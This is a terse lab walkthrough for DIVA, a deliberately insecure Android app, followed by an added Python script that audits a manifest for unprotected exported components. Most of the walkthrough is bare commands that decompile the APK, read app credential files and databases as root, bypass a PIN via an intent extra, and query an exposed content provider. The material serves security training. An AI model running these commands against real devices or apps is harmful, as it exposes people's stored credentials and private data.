Let’s Hack Android: DIVA android

  1. Santoku: https://santoku-linux.com/download/
  2. Android VM: https://www.android-x86.org/
  3. DIVA android: https://github.com/payatu/diva-android
  1. Because Android Studio on Santoku is super old, I have to uninstall it.
sudo apt purge android-studio
https://developer.android.com/studio/install
cd /home/santoku/
nano .bash_aliases
alias android-studio='sudo bash /opt/android-studio/bin/studio.sh'
. ~/.bashrc
alias
android-studio
  1. Open Diva android project
cd <apk path>
adb connect <ip>:5555
adb install app-debug.apk
  1. Dump the permissions
aapt dump permissions app-debug.apk
cp app-debug.apk app-debug.zip
ls
unzip app-debug.zip
dex2jar classes.dex
ls
jd-gui classes_dex2jar.jar
apktool d app-debug.apk
ls
cd app-debug
  1. Insecure Logging
adb logcat | grep "1234567"
adb shell
su
cd /data/data
ls
cd jakhar.aseem.diva
ls
cd shared_prefs
ls
cat jakhar.aseem.diva_preferences.xml
adb shell
su
cd /data/data/jakhar.aseem.diva/databases
ls
cp divanotes.db /sdcard/
cp ids2 /sdcard/
adb pull /sdcard/divanotes.db
adb pull /sdcard/ids2
sudo apt-get install sqlitebrowser
adb shell
cd /data/data/jakhar.aseem.diva
ls
cat <uinfo file>
adb shell
su
cd /mnt/sdcard
ls -la
cat .uinfo.txt
cat .uinfo.txt
adb shell am start -n jakhar.aseem.diva/.APICredsActivity
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity --ez check_pin false
adb shell content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes
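
The `am start -n` and `content query` commands above only succeed against components that are exported without a permission guard. The following is an added example, not part of the original post or of DIVA: a Python audit of the `AndroidManifest.xml` that `apktool d` decodes, listing such components so they can be locked down. The embedded manifest is constructed for illustration; `.MainActivity`, `.GuardedActivity`, `.NotesProvider`, the intent action and the permission name are hypothetical.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # namespace of android: attributes
COMPONENTS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest, NOT DIVA's real one. Only the package name, the
# two APICreds activity names and the provider authority come from the commands above.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="jakhar.aseem.diva">
  <application>
    <activity android:name=".MainActivity" android:exported="false"/>
    <activity android:name=".APICredsActivity">
      <intent-filter><action android:name="jakhar.aseem.diva.action.VIEW_CREDS"/></intent-filter>
    </activity>
    <activity android:name=".APICreds2Activity" android:exported="true"/>
    <activity android:name=".GuardedActivity" android:exported="true"
              android:permission="jakhar.aseem.diva.permission.GUARDED"/>
    <provider android:name=".NotesProvider" android:exported="true"
              android:authorities="jakhar.aseem.diva.provider.notesprovider"/>
  </application>
</manifest>"""

def is_exported(elem):
    """Explicit android:exported wins. Without it, an intent-filter implies export
    (the pre-Android 12 default); a provider is treated as private, which is an
    assumption that holds for targetSdkVersion >= 17."""
    flag = elem.get(A + "exported")
    if flag is not None:
        return flag.lower() == "true"
    return elem.tag != "provider" and elem.find("intent-filter") is not None

def is_guarded(elem):
    """True when a permission attribute restricts which callers may reach it."""
    if elem.get(A + "permission"):
        return True
    # A provider is fully covered only if both read and write are protected.
    return elem.tag == "provider" and bool(
        elem.get(A + "readPermission") and elem.get(A + "writePermission"))

def audit_manifest(xml_text):
    """Return (tag, name) for every exported component with no permission guard."""
    app = ET.fromstring(xml_text).find("application")
    if app is None:
        return []
    return [(e.tag, e.get(A + "name")) for e in app
            if e.tag in COMPONENTS and is_exported(e) and not is_guarded(e)]

if __name__ == "__main__":
    for tag, name in audit_manifest(SAMPLE_MANIFEST):
        print(f"exported without permission: <{tag}> {name}")
```

To audit a real build, pass the contents of `app-debug/AndroidManifest.xml` to `audit_manifest`. The launcher activity will normally be reported too, since it has to be exported.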
